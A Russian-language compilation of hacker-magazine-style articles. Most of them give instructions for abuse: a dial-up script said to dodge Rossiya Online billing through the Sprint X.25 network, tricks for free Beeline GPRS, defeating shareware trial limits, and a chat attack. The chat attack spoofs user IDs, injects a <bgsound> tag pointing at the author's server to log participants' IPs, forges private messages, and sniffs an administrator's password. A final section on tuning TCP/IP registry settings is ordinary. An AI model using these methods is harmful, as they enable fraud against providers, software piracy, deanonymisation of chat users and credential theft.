Х уже писал про то, как кинуть зажиточного прова на бабки, регистрируя сразу несколько карточек. Но этого нам оказалось мало! Была найдена супер-инфа, как сидеть в инете через "Россия онлайн" абсолютно на халяву!

Единственное, что тебе понадобится для юзания супер-фишки, так это рабочий аккаунт в ROL. Просто мы сделаем так, что с него не будут списываться деньги ;). Без долгих базаров скажу, что работать мы будем не через забитые, вечно занятые пулы Online`a, а через крутую X.25 сеть - Sprint. Т. е. звоним по номерам этой сетки.

Но, как ты понимаешь, просто так 4Free тебя туда не пустят, придётся замутить кое-какой скрипт. Держи!

proc main

delay 1

transmit "@D<cr>"

waitfor "NAL="

transmit "D1<cr>"

waitfor "@"

transmit "c 772846.1<cr>"

waitfor "login:"

transmit $USERID, raw

transmit "^M"

waitfor "password:"

transmit $PASSWORD, raw

transmit "^M"

waitfor "PPP"

endproc

Забиваешь данные строчки в текстовый файл, сохраняешь. В настройках соединения указываешь использование "Сценария". Фишка в том, что помимо юзания самого скрипта, при соединении тебе придётся в стандартном окошке "Соединения" указать уже существующий логин-пароль от ROL. Коннектишься, сидишь в инете, потом лезешь в статистику: Ба! Ни одного цента не списано со счёта! http://www.gin.ru/win/matrix_1.html Здесь ты найдёшь список модемных пулов, раскиданных по всей России. Ложка дёгтя в бочку мёда: связь действительно надёжная, но не быстрая: 14,4 - стандарт де-факто сетей X.25. Удачи!

 

 

 

 

Пришло время бесплатного интернета.

Это, наверное, Новогодние подарки от БиЛайна :)

 

Сейчас я Вам опишу два вполне законных способа бесплатного GPRS-интернета от БиЛайн.

Один простой, но непроверенный, а другой - сложный, но проверенный!

 

Простой способ не платить денежки за GPRS-интернет

Вам просто надо сделать так, чтобы Ваш балланс был отрицательным! Но неспешите. Здесь есть маленькая фишка. Тратить деньги на вашем счете надо с умом, иначе ничего неполучиться.

 

К примеру: Сейчас на Вашем телефонном счете 5$. Вы можете тратить их куда угодно, пока Ваш балланс не станет 0.50 - 0.70$. После чего вам необходимо отправить около 15-ти SMS-сообщений и ждать, пока балланс вашего счета не станет отрицательным. (до того, как снимут деньги за SMS-сообщения сидеть в интернете НЕЛЬЗЯ. Иначе неполучиться) Вот, собственно и все !

 

Я лично это еще не проверял, у меня на счету около 7$, но говорят, что работает!

 

Сложный способ не платить денежки за GPRS-интернет

Этот способ сложет тем, что вам придется достать старую SIM-карту, со старым тарифом Би+ в котором деньги замораживаются, если Вы вовремя не активировали карту. Если вы ее достали, то считайте что Вам повезло.

 

1. Положите на нее 5$.

2. Подключите услугу GPRS-интернет по номеру 67409101

3. Ждите неделю, чтобы ваш счет заморозили.

4. После заморозки Вашего счета интернет работать будет, а деньги снимать не будут!

 

Этот способ проверен!

У меня друг сейчас целыми днями зависает! А я пока еще не достал такой SIM-карты :(

 

ВНИМАНИЕ !!!

 

После того, как я проверю первый способ, я обязательно напишу в описании товара "ПРОВЕРЕННО" Впринципе, все честно и законно! Мы же не взламываем ничего, и не воруем деньги у других абонентов. Это упущенная ошибка БиЛайновцев.

 

С другими операторами не пробовал, можете сами попробовать !

 

 

 

 

 

 

 

 

 

КАК ВЗЛОМАТЬ ПРОГРАММЫЗЛОМ ПРОГРАММ


БАНКОМАТВсе наверняка знают что такое шароварные проги. Это типа те, которые работают некоторое время, а потом заставляют платить зеленых президентов. Но мы то не дураки:) Можно переинсталлить прогу, но после этого часто они все-равно не работают. В такой ситуации можно перевести часы назад. А я однаждытак перевел дату раньше чем прога появилась. Так она вообще убилась. Но не всякий любит это делать. Можно использовать кряки, но их Ты хрен сыщешь (хотя если Ты постоянный наш посетитель то ты его обязательно сможешь откопать или сам хакнуть прогу). Поэтому ломать надо более интеллектуально. Можно использовать TIME MACHINE, EXTRACTOR или STRANGE CRACK. Вот на них то мы и остановимся по подробнее. Time Machine - это программы, которые эмулируют для какой-то конкретно проги другое время. Не такое какое установлено в системном таймере. Раньше что-то похожее было в DOS'е под названием SetVer. Только он эмулировал не время а другую версию операционки. Такие программы очень выгодно использовать, т. к. одну Time Machine можно использовать для всех без исклю чения trial-прог, а вмешательства в сам код нет. Т. е. шансы что ты испортишь прогу равны 0%. Но в то же время прога осается не зарегестрированной, а значит часть функций от Тебя скрывается. Extractor - это прога для вскрытия некоторых типов защит. Дело в том, что многие программеры не придумывают свою защиту а используют уже готовую. Так вот extractor вскрывает некоторые защиты такого типа. Хотя для каждой проги пишется свой Extractor, он может пригодиться и для других прог с такой же защитой, правда могут возникнуть глюки. Но большинство прог используют свою защиту, а с ними Extractor'ы не действуют. Ну а StrangeCrack - это проги, которые ломают сразу всеми возможныи методами. Действуют либо 100% либо гробят программу. Ну и хрен с ней. С программой. Правда глюки все равно могут быть. Ну а теперь давай попробуем сломать что-нибудь сами. Вначале давай подумаем где прога может хранить даные о сроке истекания действия. Правильно - в своих файлах и в системных файлах Windows (это конечно если Ты пользуешься МастДаем). Если файлы храняться в ее файле, то можно вначале опробовать посмотреть все файлы ini, sys, dat и подобные. Лично я всегда просто пускаю поисковик по тексту. Из примеров прог которых можно хакнуть таким способом я могу привести пример SciDoctor. Но это не лучший вариант. Просто циферок таких может оказаться очень много. Если дата хранится в системных файлах Windows то это уже легче. Системные файлы Windows - это win.ini, user.dat и system.dat. User.dat и system.dat - это реестр. Так чтонайти дату в двух местах можно особо не напрягаясь. Для лазанья по реестру лучше использовать Regedit из 95виндов. Он мне как-то больше нравится. Ну вот и все. Напоследок хочу только посоветовать проги RegMon и FileMon. Они отслеживают все изменения в файлах и реестре. С их помощью найти что Тебе надо будет гораздо проще. Удачного взлома!

 

 

 

 

 

ВЗЛОМ ЧАТАЗЛОМ ФОРУМА


Предполагается, что читатель знает, что такое CGI, и на этом мы построим своё объяснение.

В любом чате фрейм, в котором вы пишете сообщения, генерится динамически (для каждого входящего) и, возможно, содержит несколько скрытых полей. Типа <input type=hidden name=cookie value=SP202134> (так хранится UserlD).

Идея в следующем: сохраняем содержимое этого фрейма на диске и исправляем его так, чтобы можно было с ним работать со своего винта. Т.е. заменяем ссылки типа /cgi-bin/refresh pi на полный путь www.chat.nsk.su/cgi-bin/refresh.pl и вместо скрытых полей формы пишем типа <mput type=text name=cookie value=SP202134> (что бы можно было их изменять) После этого делаем HTML документ для "сборки чата" из кусков. Т.е. примерно так:

"First htm"

<html>

<frameset rows="80%, 20%">

<frameset cols="70%,30%">

<frame name="razg" src= "http //www chat.nsk.su/cgi-bin/refresh cgi?win+razgovor+nocookie#end">

<frame name="right" src="http //www chat.nsk.su/right.html">

</frameset>

<frame name="bot" src="start.htm">

</frameset>

</html>

Start.htm - это и есть тот фрейм который мы сохранили и изменили.

После этого просто броузером открываем страницу (First.htm). И сразу(!!!) попадаем в чат, минуя стандартную процедуру входа.

Это позволит:

1. Обходить зарегистрированные имена.

2. Прятать свой IP от киллеров, засчет взятия чужого ID'a.

Дальше интересно вычислить IP участников. Если не запрещён тэг <bgsound src="">, то это позволит вставлять в своё сообщение ресурс со своей машины. Сам по себе звук не нужен, но этот косяк позволил вставить в свой месс строку типа <bgsound src="http://MyIP/cgi-bin/spy.exe">. Этот скрипт (spy.exe) вызывался с машины каждого участника чата. Это позволит увидеть IP всех (скрипт просто сохраняет на винт данные из переменной окружения REMOTE_ADDR). Примерно в это-же время в чате появились приваты. Это значит, что документ в главном фрейме (тот где мессы все) стал называться по другому.

До приватов:

http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor#end

После появления приватов:

http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+SP345678#end

Где SP456789 - UserlD

После этого в скрипт (spy.exe) был добавлен вывод ID'a из переменной окружения HTTP_REFERER. Ну а сопоставить ник с ID'ом не проблема, т.к. ID каждого прописан там же примерно в такой строке:

<br><b><font color = yellow size=-1>Tyт ник </font></b>

<font color=black><a href="/cgi-bin/private_form.cgi?SP448188">

<img src=/img/mes.gif border=0 vspace=0> </a> </font>

(Это строка взята из правого фрейма, где можно вызвать функцию "Кто в чате").

После этого перестало быть проблемой сопоставление ника и IP. Затем можно позабавиться с приватами.

Используя метод сохранения странички на винт, можно получить форму для отправления приватов от кого-то кому-то. Т.е. можно в отсылаемом приватно сообщении проставлять имя отправителя.

Осталось только одно. Известно, что в чате есть киллеры, но ничего не известно про то, что это, где это, как это. Известно только, что для того, чтобы киллерствовать надо зайти на какую-то страничку. Очевидно, что в этой киллерской страничке показываются имена. Предположим, что имя показывается таким, каким его вводить. Исходя из этого, под именем <bgsound src="http://MyIP/cgi-bin/spy.exe"> MyNick зашел в чат (через прокси), и начал легонько ругаться (надо было, чтобы киллеры зашли на свою страничку). После этого, изучив лог нашего ВебСервера (OmniHTTPd beta), можно увидеть там обращение со страницы, не относящейся к известным нам страницам чата. Лезем на эту страницу и получаем запрос на ввод пароля, со словами "Дорогой администратор...". Это приятно греет душу. Дальше можно подобрать пароль или ещё что придумать. Но ситуация сложилась гак, что мы оказались в одной сети с киллером, и, запустив сниффер, мы получаем пароль.

 

 

"Оптимизация интернет-соединения"

 



Освобождение канала (bandwidth), зарезервированного за сервисом QoS

Э
то такая хитрющая штука, о которой я бы вжись не догадался, если бы не прочитал на сайте улучшалок ХР. Как оказалось, Windows XP по умолчанию выделяет часть Интернет-канала для очень полезной штуки, которая называется Quality of Service (QoS). Назначение QoS - улучшать распределение трафика программ, написанных с учетом QoS API. Другое дело, что этих программ днем с огнем не сыскать (вернее, у меня лично они не стоят), поэтому резервирование канала под ненужный сервис - непозволительная роскошь. Вот что нужно проделать для того, чтобы освободить и без того узкий канал отечественного соединения с Интернетом: В меню Start - Run запустите редактор групповых полисов: gpedit.msc. Имейте ввиду, что для выполнения всех этих процедур вам необходимо войти в систему как Администратор. В
разделе Computer Configuration (в левом окне) выберите Administrative Templates. Далее Network и затем в правой панели выберите QoS Packet Scheduler и кликните на нем два раза. Выберите опцию limit reservable bandwidth и опять-таки кликните на ней два раза. В открывшемся окне включите Enabled, а затем укажите лимит канала в процентах равный нулю. ОК и выйдите из программы. Но это еще не все.
Отправляйтесь в сетевую конфигурацию (иконка Network Connections в Контрольной панели). Выделите свое соединение и из контекстного меню запустите Properties
В
закладке Networking убедитесь, что протокол QoS Packet Scheduler подключен (enabled). Если его там нет, то добавьте из списка (через кнопку Install). Перегрузите компьютер.
Все эти сложные пассы с насильственным включением сервиса и последующим выделением под него нулевого канала вызваны тем, что если просто отключить Quality of Service, то, как это часто бывает у наших антипятов, система все равно будет резервировать под него 20 % канала.

Отключение заданий по расписанию (scheduled tasks)

Всякий раз, как MSIE 6.0 соединяется с сервером, он тратит время на проверку наличия заданий по расписанию, связанных с данным адресом. Поскольку я никогда не пользовался и не планирую пользоваться функцией синхронизации Проводника, то я отключил планировщик заданий:

В реестре нужно удалить следующий ключ - HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ explorer \ RemoteComputer \ NameSpace \ {D6277990-4C6A-11CF-8D87-00AA0060F5BF}.

Оптимизация соединения Windows 98 и Millenium:

Пока цивилизованный мир вовсю осваивает Интернет, используя широкополосный доступ посредством выделенных линий, всевозможных кабельных модемов, ISDN, ADSL и прочих недоступных нашему пользователю прибамбасов, мы с вами довольствуемся дешевой и доступной (пока не ввели повременку) модемной связью, не забывая периодически ругать ее за плохое качество и низкую скорость передачи данных. Однако грамотным пользователям достаточно хорошо известно, что иногда удается заметно ускорить свою работу с Интернетом, если удачно настроить некоторые слабо документированные параметры операционной системы Windows 9x. То, что при настройке соединения с Интернет-провайдером надо первым же делом выставить параметры протокола TCP/IP, стало уже догмой и многие даже не задумываются, насколько общепринятые настройки подходят именно для их конкретного соединения. Тем более что при этом совершенно не нужно обладать какими-то особыми знаниями - программ, предназначенных для автоматического внесения в реестр Windows всех необходимых изменений настолько много, что создается впечатление, будто все начинающие программисты набираются опыта именно на "ускорителях Интернета". А между тем, слепо изменяя установленные в Windows по умолчанию значения на среднестатистические, следуя советам, почерпнутым из порой сомнительных источников, вы можете с равной вероятностью как улучшить скорость прокачки файлов, так и ухудшить ее. Tочно так же, оставив в покое настройки ОС, вы в ряде случаев будете зря терять время и деньги, не используя по максимуму свой Интернет-доступ. Что же это за таинственные параметры и каким образом следует выбирать наиболее оптимальные в каждом конкретном случае значения?

MTU

П
ервым делом, конечно же, надо разобраться с давно навязшим в зубах параметром MTU - Maximum Transmission Unit. В
реестре он задается таким образом:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\Class\NetTrans\000
х
"MaxMTU"="1500"

Это максимальный размер пакета данных, который может быть передан за один физический кадр по протоколу TCP/IP. Дело в том, что данные от компьютера к компьютеру в Интернете идут не сплошным потоком, а этими самыми кадрами - пакетами строго определенного размера. Если бы все компании и фирмы, имеющие хоть какое-то отношение к Интернету, договорились о едином стандарте на размер этих пакетов, то мы бы использовали каждый такой кадр по максимуму, полностью заполняя каналы передачи данных своими битами. Однако это не так. Мало того, что при установке нового соединения два удаленных компьютера должны согласовать между собой размер кадра, так еще и по пути к месту назначения пакет преодолевает целый ряд промежуточных серверов и маршрутизаторов, настройки MTU которых могут быть совершенно различными. При этом слишком большой пакет в пути, скорее всего, будет фрагментироваться и заполняться "воздухом", "балластом", что негативно скажется на эффективности связи. Так, если ваш провайдер имеет установки MTU=576, а у вас в Windows задано MTU=1500, то каждый ваш пакет будет им разбиваться на три по 576 байт: 576+576+576=1728 - то есть 228 байт балласта будут добавляться к каждому вашему пакету. Но даже если провайдер тоже поставил у себя MTU=1500, то при связи с удаленным сервером вполне может попасться маршрутизатор с меньшим значением MTU и пакеты опять-таки будут фрагментироваться, замедляя передачу данных. Несколько спасает ситуацию включенная в "виндах" по умолчанию функция автоматического определения MTU - "PMTU Discovery" или, как ее иногда называют, "MTU Auto Discovery", однако процедура вычисления MTU для каждого соединения требует немало времени, что чуть тормозит работу при прокачке небольших файлов и веб-серфинге. Да и в случае несогласования ваших параметров с параметрами провайдера эта функция вряд ли вам поможет. Конечно, существуют некие более или менее общепринятые стандарты для данного параметра: так, например, для Ethernet MTU равен 1500 байт, для SLIP - 1006, для PPPoE -1492, для PPP (то есть модемной связи с Интернетом) - 576. Но на деле ваш провайдер может выбрать отличное от этих значений число, исходя из каких-то своих соображений. Мы же в результате либо не загружаем свой канал связи полностью, отправляя кадры меньшего размера, чем это позволяет провайдер и часто посещаемые серверы, либо наоборот, наши установки превышают необходимое значение и большие пакеты идут фрагментированными, что еще более снижает возможности линии связи. Каждый такой пакет данных в действительности состоит из нескольких сегментов - нескольких заголовков и фактических данных. Та его часть, в которой содержатся только фактические данные, называется MSS (Maximum Segment Size) - это еще один параметр протокола TCP, определяющий самый большой сегмент данных TCP, которые могут быть переданы за один раз. То есть, MTU = MSS + заголовки TCP/IP. В реестре MSS задается так:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\VxD\MSTCP
"DefaultMSS"="
ваше число"

Для заголовка тоже имеется общепринятый размер - это 40 байт (20 байт IP и 20 байт TCP), следовательно, обычно MSS = MTU - 40. По этой причине в определении оптимального размера MTU есть некоторые тонкости. Давайте изучим передачу данных при разном размере MTU по широкополосной линии T1 (пропускная способность - 1 544 000 бит/с), используя следующую формулу:
[(MSS + заголовок) * 8 бит/байт] / [1 544 000 бит/с] = задержка на один хоп (то есть на каждый компьютер в Сети по пути нашего пакета). Используя в этой формуле разные величины MTU, мы можем вычислить задержку одного пакета. Если MTU=1500, тогда задержка = (1460 + 40) * 8 / 1 544 000 = 7,772 мс. Если же MTU=576, то задержка = (536 + 40) * 8 / 1 544 000 = 2,984 мс. Предположим, что по пути пакета встречается 10 серверов, тогда при MTU=1500 получим задержку 77,72 мс, а при MTU=576 - 29,84 мс - разница весьма заметна. Таким образом, очевидно, что меньшие пакеты будут переданы быстрее просто из-за ограничения производительности линии. Однако не все так просто.
Используя ту же формулу, давайте посчитаем, за какой промежуток времени будет передан файл размером 1 Мбайт по той же широкополосной линии T1. Один мегабайт равен 1024 кбайт или 1 048 576 байт. Если MTU=1500, то, как мы выяснили, задержка на один хоп составит 7,772 мс. Сколько при этом понадобится послать пакетов? 1 МБ / MSS = 1 048 576 / 1460 = 718,2, то есть всего требуется 719 эффективных пакетов, чтобы передать 1 мегабайт данных. Далее, умножаем 719 пакетов на 7,772 мс, получаем 5588,083 мс, или 5,588 секунд задержки на один хоп. Если же мы передаем свой файл через 10 хопов, что встречается чаще, чем один, то получаем 55,88 сек. - это время, которое мы (вернее, провайдер, имеющий линию T1) потратим на передачу файла в 1 МБ при идеальной связи. Если же MTU=576, то: 1 МБ / MSS = 1 048 576 / 536 = 1956,300, то есть при таком MTU нужно 1957 пакетов, чтобы передать 1 мегабайт. Далее, умножаем количество пакетов на задержку каждого из них: 1957 * 2,984 = 5840,580 мс, или 5,841 секунды на один хоп. Ну и соответственно на 10 хопов придется 58,41 сек. Как видим, из-за того, что при использовании больших пакетов передается меньше заголовков, реальная скорость передачи файла получается выше. Для того чтобы передать 1 мегабайт при использовании MTU = 1500 нужно переслать "довесок" заголовков из 28 760 байт, тогда как при использовании MTU=576 получаем аж 1957 * 40 = 78 280 байт, то есть дополнительные 49 520 байт заголовков на каждый мегабайт полезной информации. Для нашей 10-хоповой передачи это выливается в лишних 2,52 секунды при передаче каждого мегабайта даже при сверхбыстрой связи. Эта разница, возможно, будет еще немного выше на практике, так как современные реализации TCP/IP стремятся использовать еще большие заголовки (например, дополнительные 12 байтов заголовка для отметок времени). Если же провести аналогичные расчеты для связи по модему на скорости
33 600 кбит/с, то получим, что на передачу мегабайта информации на расстояние одного хопа, то есть непосредственно вашему провайдеру, будет потрачено в идеале 256 секунд при MTU=1500 и 268 секунд при MTU=576. Разница на одном переходе 12 секунд или около 4,5%! Но не следует забывать, что эти цифры получатся при условии отсутствия фрагментации пакетов, то есть если у вашего провайдера MTU=1500. Если же это не так, то, разумеется, больший, чем нужно, пакет будет фрагментироваться - разбиваться на несколько пакетов и даже разбавляться "воздухом", и связь ухудшится на 10-50%. Таким образом, логично считать, что большие пакеты в итоге все-таки предпочтительнее, и если ваш провайдер настроил свои серверы и маршрутизаторы на большие пакеты, то надо стремиться использовать это на всю катушку, но не забывать и о том, что в Интернете встречаются серверы с MTU=576 (об этом чуть ниже мы еще поговорим). Тем не менее, если чистая производительность не является окончательной целью, то меньшие пакеты будут более "быстрыми", поскольку они требуют меньше времени для своих путешествий по Сети. Этот эффект может перевешивать все другие достоинства больших пакетов в некоторых Интернет-приложениях и онлайновых играх за счет уменьшения времени отклика удаленного сервера при передаче небольших объемов информации. В Интернете по пути следования ваших пакетов, вероятно, встретятся самые разные серверы с самыми разными настройками, но для начала все-таки желательно определить наилучшее значение MTU при связи только с вашим провайдером, поскольку именно оно может оказать решающее значение при оптимизации вашего доступа в Сеть Windows 95 разработчиками по умолчанию было выбрано MTU=1500, что якобы не соответствует оптимальному для модемного соединения значению, которое всеми считается равным 576. В Windows 98 корпорация Microsoft уже исправила этот недостаток, и теперь по умолчанию при соединениях ниже 128 килобит в секунду мы имеем MTU=576, что вроде бы должно чаще оказываться наилучшим вариантом. Попробуем разобраться, так ли оно на самом деле.

Итак, есть несколько способов определить значение MTU, оптимальное для связи с вашим Интернет-провайдером.
1. Послать письмо с вопросом в службу технической поддержки провайдера. Тут в принципе все понятно - если работники провайдера сами в курсе своих собственных настроек, то они дадут вам квалифицированный ответ, который, впрочем, не помешает все-таки и проверить самолично на практике. 2. Подключиться к Интернету в терминальном режиме - иногда при осуществлении регистрации пользователя в одной из строк появляется рекомендуемое значение MTU. Для этого войдите в папку "Удаленный доступ", найдите там значок своего соединения и, щелкнув по нему правой кнопкой мыши, выберите пункт "Свойства". На странице "Общие" открывшегося меню жмите кнопку "Настроить" возле строки с названием вашего модема и в диалоге свойств модема переходите на вкладку "Дополнительно", где установите флажок "Выводить окно терминала после соединения". Теперь соединяйтесь с провайдером и при появлении окна терминала вводите вручную имя пользователя и пароль по соответствующим запросам. Если после этого вы увидите что-то типа "Entering PPP mode. Your IP address is ххххх.ххх.ххх. MaxMTU is 1524", то вам повезло - вы получили MTU провайдера. Но и тут нелишним будет проверить это значение лично. 3. И, наконец, ручное определение MTU.

Определение MTU вручную

Д
ля адекватных результатов экспериментов обязательно необходимо выставить в операционной системе максимальный размер MTU=1500. Поэтому, если вы уже пытались изменять этот параметр с помощью какой-то программы или вручную в реестре, то обязательно отмените все внесенные изменения, вернув default-настройки. В этом вам помогут утилиты Internet Tweak 2001 (http://www.magellass.com/), NetBoost 99 (http://www.download.ru/), iSpeed (http://www.hms.com/), MTUSpeed (http://www.mjs.u-net.com/), BlazeNET (http://www.indeavour.com/html_about_blazenet.htm) - выбирайте по вкусу. В реестре же вам придется проконтролировать это в разделе:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\Class\NetTrans\000х

Если найдете там параметр MaxMTU, то смело удаляйте его. Далее, открываем "Панель управления" (Control Panel) - "Сеть" (Network), выбираем "Контроллер удаленного доступа" (Dial-Up Adapter) и жмем кнопку "Свойства" (Properties). На вкладке "Дополнительно" (Advanced) появившегося меню устанавливаем большой размера IP-пакета ("IP Packet Size" - "Large"). Тем самым мы установили для нашего соединения MTU=1500. Перегружаем компьютер, чтобы изменения вступили в силу. Теперь надо установить соединение с Интернетом и посмотреть, будут ли фрагментироваться пакеты различного размера. Для этого можно использовать и стандартную программу Ping из комплекта Windows, задавая ей такие параметры: ping -f -l 1500 ххххх.ххх.ххх, где "ххх.ххх.ххх.ххх" - IP-адрес тестируемого сервера, а "-I" - это буква L, а не единица. Но гораздо удобнее применять что-нибудь типа утилит CyberKit (http://www.cyberkit.net/

 или IPTools (http://www.ks-soft.net/ip-tools.eng/index.htm

) - в них есть приятный графический интерфейс вместо анахронизма командной строки Ping. Определяем сначала этой же многофункциональной программой IP-адрес одного из серверов вашего провайдера, тем самым мы избежим запросов к DNS-серверу во время тестирования. Примените для этого вкладку "TraceRoute", введя в поле адреса URL провайдера. Теперь полученный IP вводим на странице "Ping", задаем для начала размер пакета 1500 и ставим флажок "Don't fragment" - "Не фрагментировать". В поле, где задается количество тестовых пакетов ставьте штук 5-6 - для того чтобы исключить случайные ошибки. Кстати, тест лучше проводить глубокой ночью, когда на линиях сидит мало народа и помех в телефонных сетях минимум. Если никакого ответа не получено и наш пакет потерян, так как фрагментировать мы его запретили, а его размер слишком велик для настроек оборудования провайдера, то начинаем постепенно уменьшать величину пакета до тех пор, пока не станем получать отклики от сервера со значением этого самого "пинга". Так, например, для провайдера CEA мы получим размер неделимого пакета в 1472 байта. Означает ли это, что он использует MTU=1472? Нет, у него MTU=1500, просто Ping прибавляет к нашим данным заголовок, который по-разному учитывается удаленными серверами, например, CEA не принимает во внимание заголовок IP (20 байтов) и ICMP (8 байтов) при отчете о своем MTU. Если же вам не повезло, и ваш провайдер выбрал меньшее значение, то ищите его среди таких чаще всего попадающихся цифр (также не забывая и о заголовке пакета): 1524, 1152, 1024, 1006, 576, 568, 560, 552, 548, 536, 528, 520, 512. Таким образом, мы выяснили, что можно выбирать любой MTU, вплоть до 1500. Попробуйте теперь осуществить загрузку одного и того же ZIP-файла размером 1 мегабайт с одного и того же быстрого сервера при разных значениях MTU - максимальном, полученном от провайдера, и рекомендуемом 576. Для чистоты эксперимента отключите автоопределение MTU - параметр PMTU Discovery (о том, как его найти в реестре, читайте в конце статьи). Скорее всего, вы обнаружите, что наши расчеты, говорящие о предпочтительности больших пакетов, справедливы. Проведите и такой эксперимент: "пингуйте" наибольшим нефрагментируемым пакетом (в нашем случае это 1472, то бишь MTU=1500) сайты, занесенные в список закладок. Вас ждет удивительное открытие - оказывается, большинство сайтов прекрасно воспринимают MTU=1500 и все пакеты до них доходят нефрагментированными. Где же тот самый MTU=576, который якобы преобладает в Интернете? Проверьте также и свою любимую сетевую игру при разных MTU. Исходя из полученных данных, а не из того, что вам советуют всевозможные "эксперты", сами никогда не проделывавшие подобных опытов, а повторяющие только то, что принято за истину на загнивающем Западе, вы уже гораздо более объективно определите, какое же значение наилучшим образом согласуется с вашим Интернет-доступом - наибольшее или меньшее. Действительно, на качество и скорость работы в Сети сильное влияние оказывает фрагментация пакетов, которая происходит, если большой пакет проходит через сеть, имеющую MTU меньше, чем длина вашего пакета. Можно, конечно, перестраховаться и выбрать самый минимальный размер MTU, при котором пакеты наверняка не будут фрагментироваться, но это может сказаться на быстродействии вашей системы еще более пагубно, чем использование больших пакетов. На самом же деле, главное - чтобы ваш MTU не превосходил MTU провайдера, при включенной же функции PMTU система сама найдет для ваших пакетов такой путь в Сети, при котором они не будут фрагментироваться. Кстати, если вы обнаружите, что у провайдера установлено MTU=512 и менее, то есть смысл подумать о его смене - слишком много шлака будет передаваться вместе с вашими данными.

Другие параметры

Н
е только от одного MTU зависит качество вашей работы в Интернете, существует немало и других параметров протокола TCP, с которыми стоит поэкспериментировать. Конечно, есть уже некоторые готовые рекомендации и в этом случае, но, бездумно им доверяя, вы имеете шанс получить совсем не тот результат, к которому стремитесь. Поэтому и тут крайне желательно для каждого параметра провести свой эксперимент, определяя, какой эффект вызывает его изменение в вашей конкретной системе. Многие из этих параметров легко выставляются с помощью все тех же незамысловатых утилит, что и MTU.

RWIN (receive window, окно приема) - размер буфера, в котором накапливается содержимое области данных (MSS) нескольких полученных пакетов, прежде чем передается дальше, например, в браузер. При недостаточном размере этого буфера иногда происходит его переполнение и поступающие пакеты отвергаются и теряются. Размер RWIN обязательно должен быть кратен MSS и обычно для лучшей эффективности модемного соединения кратность рекомендуется устанавливать равной 4-8. Однако чрезмерно большой размер буфера также нежелателен, особенно на плохих линиях - при потере всего одного пакета в случае сбоя на линии будет повторно затребован не один потерянный пакет, а все пакеты из этого буфера, что займет некоторое время. В реестре этот параметр находится здесь:

HKEY_LOCAL_MACHINE\System\CurrentControl
Set\Services\VxD\MSTCP
"DefaultRcvWindow"="ваше значение"

TTL (time to live, время жизни) - количество хопов, то есть промежуточных серверов, через которые может пройти ваш пакет в поисках своего места назначения. Каждый такой сервер добавляет единицу к специальному счетчику в заголовке вашего пакета, и, когда счетчик достигает максимально разрешенного значения, пакет считается заблудившимся и прекращает свое существование. По умолчанию TTL равен 32, что сегодня явно недостаточно для разросшегося Интернета: нередки случаи, когда удаленный сервер находится более чем в 32 переходах, поэтому TTL следует увеличить как минимум до 64:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP
"DefaultTTL"="64"

IPMTU - Internet Protocol MTU - в Windows 98, по сути, это то же самое, что и MTU, но применительно только к контроллеру удаленного доступа. В реестре он упоминается несколько раз:

HKEY_LOCAL_MACHINE\System\CurrentControlSet
\Services\Class\Net\000
х
"IPMTU"="1500" HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\Class\Net\000
х\Ndi\params\IPMTU
"default"="1500"
@="1500"

PMTU (Path MTU, путевое значение MTU) - этот параметр разрешает Windows самой определять оптимальное значение MTU при организации соединения с каждым сервером. При этом серверу посылается ряд нефрагментируемых пакетов разного, постепенно уменьшающегося размера и как только очередной пакет достигнет сервера, его размер и считается оптимальным. На эту процедуру, разумеется, требуется некоторое время и по умолчанию она включена, в связи с чем часто советуют ее дезактивировать, что, пожалуй, все-таки довольно спорно - потерять на этом времени можно больше из-за того, что наилучший размер блока данных определен не будет и пакеты пойдут фрагментированными. Выключается же этот режим так:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP
"PMTUDiscovery"="0"

PMTUBlackHole Detect (обнаружение "черных дыр") - установка этого параметра разрешает протоколу TCP пытаться обнаружить никуда не ведущие роутеры и те, что не возвращают ICMP-сообщений о необходимости фрагментации при определении наилучшего MTU. Это также, как и любая дополнительная процедура, может замедлять работу в Интернете - попробуйте поэкспериментировать с ее отключением:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP
"PMTUBlackHoleDetect"="0"

SessionKeepAlive (поддержание соединения) - определяет, как часто будут посылаться специальные пакеты информации, предотвращающие отключение вас сервером в случае отсутствия активности в Сети с вашей стороны. Минимум - одна минута, по умолчанию - один час в Windows Me / 9x и два часа в Windows 2000. Рекомендуемый интервал - 10 минут, параметр задается в секундах:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP "SessionKeepAlive"="600"

SlowNet - отключение этой функции может сократить задержки в передаче данных, но сей эффект уловить не так-то просто.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\
Class\Net\000
х
"SLOWNET"=hex:00

NDI Cache (Network Device Interface Cache) - кэш, в котором хранятся данные о маршрутах движения пакетов, по умолчанию его размер равен нулю. Чтобы его задействовать наиболее оптимально, необходимо установить его размер равным 16 при модемном соединении или 32 при более скоростных подключениях:

HKEY_LOCAL_MACHINE\System\CurrentControlSet
\Services\VxD\NWLink\Ndi\params\cachesize
@="16"

В реестре обычно рекомендуется выставить еще некоторые параметры, влияние которых на качество связи проследить вообще чрезвычайно сложно, но попробовать поэкспериментировать с их значениями можно:

HKEY_LOCAL_MACHINE\System\CurrentControl
Set\Services\VxD\NWLink\Ndi\params\maxconnect
@="64"
"max"="128"
"min"="2" HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\VxD\NWLink\Ndi\params\maxsockets
@="255"
"max"="1020"
"min"="32" HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\VxD\NETBEUI\Ndi\params\ncbs
"default"="32"
"max"="255"
"min"="8" HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\VxD\NETBEUI\Ndi\params\sessions
"default"="32"
"max"="117"
"min"="4"

А нижеследующие параметры устраняют, по заверениям Microsoft, какие-то "глюки" Windows и увеличивают скорость работы вашего браузера:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\VxD\MSTCP
"BSDUrgent"="1"
"Tcp1323Opts"=dword:00000003
"SackOpts"="1"

